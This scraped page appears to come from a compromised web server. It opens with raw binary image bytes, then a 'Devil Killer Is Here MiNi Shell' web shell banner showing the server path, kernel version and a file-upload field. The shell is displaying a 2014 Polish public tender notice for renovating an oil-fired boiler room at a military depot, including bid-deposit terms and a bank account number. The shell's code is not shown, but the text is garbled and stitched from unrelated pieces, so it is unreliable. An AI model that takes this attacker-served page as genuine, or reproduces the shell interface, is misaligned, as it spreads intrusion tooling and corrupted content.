JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140829/185837-N-2014.html

<p class="kh_header"><b>Wrocław: REMONT KOTŁOWNI OLEJOWEJ USYTUOWANEJ 
W BUDYNKU NR 14 W SKŁADZIE KRAPKOWICE</b><br>
<b>Numer ogłoszenia: 185837 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 71 765 68 40, faks 71 765 68 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rziwroclaw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT KOTŁOWNI OLEJOWEJ USYTUOWANEJ 
W BUDYNKU NR 14 W SKŁADZIE KRAPKOWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zadanie: Remont kotłowni olejowej usytuowanej w budynku nr 14 w  Składzie  Krapkowice. Dokumentacja projektowa stanowi opis przedmiotu zamówienia zgodnie z ustawą Prawo Zamówień Publicznych i spełnia wymogi stawiane w art. 29,30,31 ustawy. 

STAN ISTNIEJACY 

Istniejąca kotłownia wodna, niskotemperaturowa, o mocy 800 kW, zlokalizowana jest w piwnicy budynku nr 14- łaźnia na terenie Składu Krapkowice. Obecnie kotłownia zasila w ciepło obiekty na terenie kompleksu. Budynek, w którym zlokalizowana jest kotłownia jest budynkiem wolnostojącym, dwukondygnacyjnym.
Kotłownia wraz z magazynem paliwa z czterema zbiornikami stalowymi o łącznej pojemności 18720 l, zlokalizowana jest  części podpiwniczonej, a w części nadziemnej na parterze budynku znajduje się łaźnia.
W kotłowni zainstalowane są trzy kotły wodne typ CERAMA : 2X200 kW i 1x 400 kW, wyposażone w palniki firmy Riello.
. 
ZAKRES RZECZOWY PRZEDMIOTU ZAMÓWIENIA

Szczegółowy zakres rzeczowy określa dokumentacja projektowa (przedmiary robót należy traktować jako materiał pomocniczy) i specyfikacja techniczna wykonania i odbioru robót.
Dokumentacja projektowa dostępna jest na stronie Zamawiającego w wersji elektronicznej, natomiast w wersji papierowej zostanie przekazana Wykonawcy robót po zawarciu umowy.
1 Roboty demontażowe:
	
1) Demontaż istniejących zbiorników stalowych na olej o pojemności łącznej 18720 l wraz instalacją olejową zalewowa i odpowietrzającą zbiorniki i zasilająca palniki w kotłowni. Należy wypompować olej a zbiorniki po oczyszczeniu z resztek paliwa i zanieczyszczeń wraz z instalacją i armaturą olejową zdemontować. Odpady przekazać firmie zajmującej się utylizacją.
2) Demontaż istniejącego zbiornika cwu, wymienników ciepła typu Jad, zbiornika wody uzupełniającej, stacji uzdatniana wody oraz istniejącego naczynia przeponowego Reflex
3) Demontaż pomp obiegowych wraz z pompami należy zdemontować fundament
4) Demontaż istniejących drzwi stalowych wewnętrznych w pomieszczeniu kotłowni
5) Wywóz  gruzu i śmieci oraz złomu.

2. Prace budowlane:

1) W magazynie paliwa należy wykonać nową wannę. Wnętrze istniejącej wanny olejowej skuć, przygotować podłoże, w wannie przewidzieć studzienkę szczelną do odpompowania oleju i wykonać izolację szczelną na przenikanie oleju, następnie całą wannę wyłożyć płytkami ceramicznymi odpornymi na olej, w wannie olejowej przewidzieć spadki 2 % do istniejącej studzienki.
2) W pomieszczeniu kotłowni i magazynu paliwa naprawić pęknięcia, uzupełnić ubytki i brakujące tynki na ścianach, wyszpachlować ściany i dwukrotnie pomalować farbą emulsyjną ściany i sufit. Uszkodzone płytki wymienić, odspojone od podłoża podkleić. W miejscu po fundamentach istniejących pomp uzupełnić płytki. 
3) Otwory po kanałach wentylacyjnych zamurować cegłą pełną, uzupełnić tynki  i pomalować.
4) Kanał nawiewny w kotłowni, (który pozostawiamy), należy wyprowadzić  po ścianie zewnętrznej  100 cm powyżej poziomu terenu.
5) Otwór wentylacyjny wywiewny w kotłowni należy powiększyć ,wykuć, tak, aby górna krawędź otworu była możliwie blisko stropu (nie więcej niż 10 cm ).
6) Wywiew z pomieszczenia magazynu paliwa- kanał wentylacyjny o wymiarach 43x43cm należy wyprowadzić ponad dach 50 cm ponad krawędź dachu na zewnętrznej ścianie budynku.
7) Nawiew do magazynu paliwa kanałem zetowym o wymiarach 36x36 należy przenieść poza obrys istniejącej wanny, wykorzystując istniejący otwór w ścianie zewnętrznej i po osadzeniu kanału przemurować i otynkować. Czernię kanału umieścić 2 m nad terenem na ścianie zewnętrznej. Otwór po istniejącym kanale nawiewnym zamurować i otynkować.
8) Wkładki kominowe usytuowane w kanale ceramicznym 50x50 cm. Wyloty wkładek spalinowych nieprzykręcone. Jedna wkładka ma odwrotnie założoną nasadę kominowa, druga nie ma nasady. Wyloty wkładek przykręcić i na obu kanałach zamontować prawidłowo wyloty.
9) Na zewnętrznej ścianie magazynu paliwa zamontować należy szafkę wlewu paliwa i oznakować.
10) Wymienić pokrywę istniejącej studzienki schładzającej.
11) Kotłownie wyposażyć w gaśnicę i oznakować tablicami informacyjnymi drzwi.
12) Istniejące drzwi zewnętrzne do kotłowni wyposażyć w samozamykacz.
13) Wykonać przejścia ogniowe instalacji. Na istniejącej instalacji kanalizacyjnej założyć opaski ogniochronne. Wszystkie przejścia instalacji przez ściany oddzielenia pożarowego wykonać w technologii przejść ogniowych.
14) Pomalować farbą antykorozyjną i olejową skorodowane rury instalacji wod-kan.

3. Prace montażowe:

1) W magazynie oleju przewidziano montaż dwóch baterii zbiorników z tworzywa sztucznego typu Werit  2x 5 szt.  o pojemności 2000 l każdy. Łączna pojemność zbiorników wyniesie 20000 l.
2) Dla baterii zbiorników wykonać należy stalowe rury zalewowe i wspólną oddechową. Rurę oddechową wyprowadzić ponad dach i zakończyć kołpakiem odpowietrzającym. Kolejne odcinki łączone powinny być przez spawanie. Rury zalewowe zakończyć należy wlewami paliwa w skrzynce na zewnętrznej ścianie budynku. Instalację olejową do palników wykonać, jako jednorurową z rurek miedzianych 10 łączonych przez lutowanie. Całą instalację olejową przed uruchomieniem poddać należy próbie szczelności sprężonym powietrzem.
3) Wykonać podłączenie palników za pomocą przewodów paliwowych z atestem, zamontować filtry olejowe.
4) Instalację co i c.w.u. przechodzącą przez magazyn paliwa wymienić na nową i zaizolować. Instalację wykonać z rur stalowych. 
5) Należy uzupełnić izolację w miejscach jej braku na istniejącej instalacji w pomieszczeniu kotłowni z izolacji z pianki poliuretanowej.
6) Po wykonaniu orurowania należy wykonać próbę szczelności wykonanej instalacji.
7) Zamontować układ stabilizacji ciśnienia Reflexomat RG 600 sterownany kompresorem z jednostką sterującą.
8) Zamontować dwie pompy obiegowe typu Magma 3 80-120 F 360 230V PN6 wraz z podłączeniem.
9) W pomieszczeniu kotłowni zamontować  jednokomorowy  zlew ze stali nierdzewnej i podłączyć do istniejącej instalacji wod - kan.
10)  Istniejącą zdemontowaną stację uzdatniania zamontować w pomieszczeniu kotłowni.
11) Zlecić uprawnionemu mistrzowi kominiarskiemu i przedstawić Inwestorowi odpowiedni protokół odbioru prawidłowości wykonania systemu odprowadzania spalin i wentylacji grawitacyjnej, zarówno w kotłowni i magazynie paliwa. 
12) W obu bateriach zbiorników zamontować pneumatyczny wskaźnik poziomu oleju opałowego np. Unitel firmy AFRISO, wskaźniki zamontować na ścianie w magazynie paliwa i połączyć z pakietem flexbloku zamontowanym w pierwszym zbiorniku każdej baterii.
13) Po podłączeniu układu stabilizacji ciśnienia urządzenie należy zgłosić do odbioru WDT ( Wojskowy Dozór Techniczny) i uczestniczyć w odbiorze.

        

         Tablica główna TG:

1.	Wymienić stycznik główny TSM 100 na nowy modułowy Z-SCH230 63-40 Moeller oraz sterujący SLA-7 na nowy Z-SCH230/25-40. Stycznik główny skojarzony jest z wyłącznikiem pożarowym na zewnątrz budynku. Po wymianie stycznika sprawdzić działanie systemu. 

         Rozdzielnica RK:

1.	Wymienić wszystkie styczniki obwodowe TSM na modułowe Z-SCH230,25-40, oraz wył. P121 Fael jako zabezpieczenia kotłów na nowe.  Zabezpieczenia  nadprądowe S193 C-6 oraz okablowanie styczników dostosować do nowych urządzeń. 
2.	Wyłączniki różnicowo-prądowe tych obwodów wymienić na inne o charakterystyce A ( wymagane do utrzymywania gwarancji na pompy).
3.	 Należy przeprowadzić nowy (dodatkowy) obwód w zabezpieczeniem C-4 dla Reflexomatu oraz C-2 dla systemów kontroli poziomu oleju.

     Instalacja reflexomatu i systemu kontroli poziomu oleju oraz systemu alarmowego:

1.Wymienić pulpit kotła nr 2 na nowy (z licznikami godzin pracy palnika dla każdego stopnia oddzielnie) przygotowany do współpracy z planikiem RS-38 oraz miejscem na moduł elektroniczny stopniowej kaskady kotłów nr 2 i 3.
2. Pulpit kotła nr 3 pozostawić bez zmian i wmontować w wolne miejsce drugi moduł kaskadowy,E8 oba moduły połączyć linią BUS i zainstalować czujniki oraz dwa liczniki godzin pracy palnika dla każdego stopnia.
3. Na zewnątrz budynku przy wlewach paliwa umieścić sygnalizatory optyczno-akustyczne oznaczone podobnie jak moduły.
4. Zamontować dwa elektroniczne systemy kontroli WATCH DOG MINI,MAXI,MELDER oparte na dwóch sondach zintegrowanych typu 150. Sondy zanurzyć w pierwszym zbiorniku każdej baterii (ok. 20cm poniżej górnej krawędzi -MAXI i 10 cm od dna - MINI).

      Uziom cysterny:

1.Odkopać istniejący uziom otokowy w odległości 0,6-1m od ściany budynku, do uziomu podłączyć przez spawanie bednarkę (miejsce spawania zabezpieczyć antykorozyjnie)  i zamontować dodatkowe złącze kontrolne na ścianie budynku H=1,5 m od ziemi w pobliżu wlewów paliwa.
2. Rurę odpowietrzania zbiorników wyprowadzoną ponad dach połączyć obchwytem z siatką zwodów poziomych istniejącej instalacji odgromowej, a w dolnej części z wyprowadzonym uziomem dla cysterny (połącznie rozłączne). 

       Pomiary elektryczne:

 Po wykonaniu prac, wykonać pomiary:
- rezystancji izolacji
- skuteczności ochrony przeciwpożarowej
- skuteczności działania wyłączników różnicowo-prądowych
- rezystancji uziemień i ciągłości połączeń wyrównawczych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.21.00.00-2, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium 
w wysokości - 5 500,00 zł,
2. Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego do dnia 16.09.2014 r. do godz. 10.00. Nie dopuszcza się wnoszenia wadium w formie gotówki do kasy Zamawiającego.
3. Wadium wniesione w postaci poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, 
z późn. zm.) musi zawierać co najmniej:
a)	nazwę i adres Wykonawcy, 
b)	nazwę i adres beneficjenta, 
c)	nazwę i adres gwaranta/ poręczyciela,
d)	nazwa zadania, na które składane jest wadium,
e)	kwotę,
f)	termin ważności,
g)	wskazanie wszystkich przypadków powodujących utratę wadium zgodnie 
z art. art. 46 ust. 4a i  ust. 5 ustawy Pzp.
Wadium, o którym mowa w pkt 3.6.3 musi zostać złożone w kasie Zamawiającego (bud. RZI, pok. 20) w terminie do dnia - 16.09.2014 r. 
do godz. 10.00. 
W przypadku, gdy Wykonawca nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, 
o którym mowa w art. 46 ust. 3 ustawy Pzp, albo nie zgodził się na przedłużenie okresu związania ofertą, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt. 2. 4. W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto 
NBP oOkr we Wrocławiu 78 1010 1674 0030 7213 9120 1000, 
z dopiskiem wadium dotyczące przetargu nieograniczonego na remont kotłowni olejowej w Krapkowicach.
5. Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie 
po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,
z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 3.6.7. SIWZ.
6. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących 
po jego stronie.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
11. Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
12. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie 
po wniesieniu wymaganego zabezpieczenia należytego wykonania umowy 
i zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać doświadczenie w okresie ostatnich pięciu lat, 
a jeżeli okres działalności jest krótszy - w tym okresie, że wykonał 
co najmniej jedną realizację polegającą na remoncie kotłowni olejowej 
o mocy powyżej 600 kW
. Na potwierdzenie ww. warunku należy załączyć wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia wskazanego w pkt. 1.5.1 SIWZ A, wykonanych 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich rodzaju i wartości, dat i miejsc wykonania (oryginał podpisany przez Wykonawcę) - Formularz nr 7, wraz z załączeniem dowodów dotyczących najważniejszych robót określających, że roboty zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (oryginał lub kopia dokumentu poświadczona za zgodność z oryginałem przez Wykonawcę); 
              Za główną robotę Zamawiający uznaje robotę wskazaną w pkt. 1.5.1 SIWZ.

Dowodem, o którym mowa powyżej jest poświadczenie lub inny dokument, jeżeli
 z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w poświadczenia. 
Wykonawca, w miejsce ww. poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie roboty budowlane, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013, poz. 213).
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest 
w stanie uzyskać ww. poświadczenia, do oferty należy załączyć oświadczenie Wykonawcy wraz z uzasadnieniem przyczyn o których mowa wyżej.
1.1.8	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 8). 
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, w tym kopia dokumentu potwierdzona za zgodność z oryginałem. W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy 
i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje kierownikiem budowy 
i kierownikami robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu  zawodowego:
a)	kierownik budowy z uprawnieniami budowlanymi o specjalności  konstrukcyjno - budowlanej bez ograniczeń. 
Osoby, które przed dniem wejścia w życie ustawy tj. przed 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm. - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych 
w budownictwie, zachowują uprawnienia do pełnienia tych funkcji 
w dotychczasowym zakresie,
b)	kierownik robót instalacyjnych z uprawnieniami budowlanymi 
o specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.  Osoby, które przed dniem wejścia w życie ustawy tj. przed 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm. - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie,
c)	kierownik robót instalacyjnych z uprawnieniami budowlanymi 
o specjalności w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń.  Osoby, które przed dniem wejścia w życie ustawy
tj. przed 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm. - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
Na potwierdzenie ww. warunku należy załączyć do oferty 1.1.3	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, 
w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 3 SIWZ A. 1.5.3	Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.1.1.8	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 8). 
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, w tym kopia dokumentu potwierdzona za zgodność z oryginałem. W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy 
i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>1.5.1	Wykonawca musi wykazać doświadczenie w okresie ostatnich pięciu lat, 
a jeżeli okres działalności jest krótszy - w tym okresie, że wykonał 
co najmniej jedną realizację polegającą na remoncie kotłowni olejowej 
o mocy powyżej 600 kW;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

